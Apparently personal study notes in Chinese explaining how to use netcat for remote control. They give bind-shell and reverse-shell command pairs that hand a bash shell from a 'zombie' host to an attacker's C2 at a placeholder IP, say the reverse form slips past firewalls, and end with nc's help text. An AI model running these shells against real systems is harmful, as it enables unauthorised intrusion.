=== nc 做遠程控制 ===
原理實際上和之前的傳文本一樣,服務器端起監聽,客戶端端去鏈接,之後監聽的服務器端傳一個自己的shell過去到客戶端
正向:偵聽方爲肉雞,C2 訪問肉雞
SERVER: nc -lp 333 -c bash
CLIENT: nc -nv 1.1.1.1 333
或者反向:偵聽方爲C2,肉雞訪問C2
SERVER :nc -lp 333
CLIENT : nc -nv 1.1.1.1 333 -c bash
-c shell command。也就是要使用的shell。windows下用cmd
注意,誰使用-c bash,誰就是肉雞。肉雞發 shell。反向的可以用來穿牆。因爲是從肉雞,從內網,向外(攻擊者的C2電腦)發起訪問。
類似的原理可以用在其他協議的穿牆上。比如ftp的passive和active mode
root@kali:~/Documents# nc -h
[v1.10-41]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [-options] [hostname] [port]
options:
-c shell commands as `-e'; use /bin/sh to exec [dangerous!!]
-e filename program to exec after connect [dangerous!!]
-b allow broadcasts
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-k set keepalive option on socket
-l listen mode, for inbound connects
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-q secs quit after EOF on stdin and delay of secs
-s addr local source address
-T tos set Type Of Service
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-C Send CRLF as line-ending
-z zero-I/O mode [used for scanning]